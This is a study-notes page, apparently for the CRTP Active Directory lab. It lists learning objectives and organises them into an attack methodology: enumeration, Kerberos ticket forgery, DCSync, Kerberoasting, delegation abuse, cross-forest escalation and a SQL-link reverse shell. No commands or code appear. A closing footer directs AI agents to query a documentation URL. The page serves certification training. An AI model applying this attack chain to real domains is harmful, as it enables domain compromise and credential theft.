# Methodology

<details>

<summary>OBJECTIVES</summary>

### Learning Objective 1:

• Enumerate following for the dollarcorp domain: − Users − Computers − Domain Administrators − Enterprise Administrato

### Learning Objective 2:

• Enumerate following for the dollarcorp domain: − List all the OUs − List all the computers in the StudentMachines OU. − List the GPOs − Enumerate GPO applied on the StudentMachines OU.

### Learning Objective 3:

• Enumerate following for the dollarcorp domain: − ACL for the Domain Admins group − All modify rights/permissions for the studentx

### Learning Objective 4:

• Enumerate all domains in the moneycorp.local forest. • Map the trusts of the dollarcorp.moneycorp.local domain. • Map External trusts in moneycorp.local forest. • Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting forest?

### Learning Objective 5:

• Exploit a service on dcorp-studentx and elevate privileges to local administrator. • Identify a machine in the domain where studentx has local administrative access. • Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 -the dcorp-ci serve

### Learning Objective 7:

• Identify a machine in the target domain where a Domain Admin session is available. • Compromise the machine and escalate privileges to Domain Admin − Using access to dcorp-ci − Using derivative local admin

### Learning Objective 8:

• Extract secrets from the domain controller of dollarcorp. • Using the secrets of krbtgt account, create a Golden ticket. • Use the Golden ticket to (once again) get domain admin privileges from a machine.

### Learning Objective 9:

• Try to get command execution on the domain controller by creating silver ticket for: − HOST service − WMI

### Learning Objective 10:

• Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.

### Learning Objective 11:

• Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

### Learning Objective 12:

• Check if studentx has Replication (DCSync) rights. • If yes, execute the DCSync attack to pull hashes of the krbtgt user. • If no, add the replication rights for the studentx and execute the DCSync attack to pull hashes of the krbtgt user.

### Learning Objective 13:

• Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. • Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.

### Learning Objective 14:

• Using the Kerberoast attack, crack password of a SQL server service account.

### Learning Objective 15:

• Find a server in the dcorp domain where Unconstrained Delegation is enabled. • Compromise the server and escalate to Domain Admin privileges. • Escalate to Enterprise Admins privileges by abusing Printer Bug!

### Learning Objective 16:

• Enumerate users in the domain for whom Constrained Delegation is enabled. − For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured. − Pass the ticket and access the service. • Enumerate computer accounts in the domain for which Constrained Delegation is enabled. − For such a user, request a TGT from the DC. − Obtain an alternate TGS for LDAP service on the target machine. − Use the TGS for executing DCSync attack.

### Learning Objective 17:

• Find a computer object in dcorp domain where we have Write permissions. • Abuse the Write permissions to access that computer as Domain Admin.

### Learning Objective 18:

• Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key.

### Learning Objective 19:

• Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.

### Learning Objective 20:

• With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest.

### Learning Objective 21:

• Check if AD CS is used by the target forest and find any vulnerable/abusable templates. • Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

### Learning Objective 22:

• Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp- mssql.

</details>

## Enumeration

1. Domain , Domain Controller , Forest & Trust-Mapping
2. Users & computers
3. Group & Group member

## Privesc 'own user' => Local Admin

Learning Objective 5

## Privesc Local Admin => Domain Admin

Learning Objective 7--------------------------------------------domain admin session

Learning Objective 17--------------------------------------------Abusing Write permission (ACL)

## Domain Admin presistance

Learning Objective 8--------------------------------------------golden ticket

Learning Objective 9--------------------------------------------silver ticket

Learning Objective 10-------------------------------------------diamond ticket

## using Domain Admin exploiting other services

Learning Objective 11--------------------------------------------Abusing DSMR

Learning Objective 12--------------------------------------------DCsync rights replication

Learning Objective 13------------------------security descriptors & machine account hash from DC

Learning Objective 14--------------------------------------------Kerberoast attack

Learning Objective 15--------------------------------------------Constrained Delegation

Learning Objective 16--------------------------------------------UnConstrained Delegation

## Cross Forest Attacks

Learning Objective 18----------------------------Domain Admin => Forest DC or EA using Trust key

Learning Objective 19---------------------------Domain Admin => Forest DC or EA using krbtgt user

Learning Objective 20----------------------------Domain Admin => Eurocorp DC sharedwithDCorp


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mokshs-private-organization.gitbook.io/crtp/methodology.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.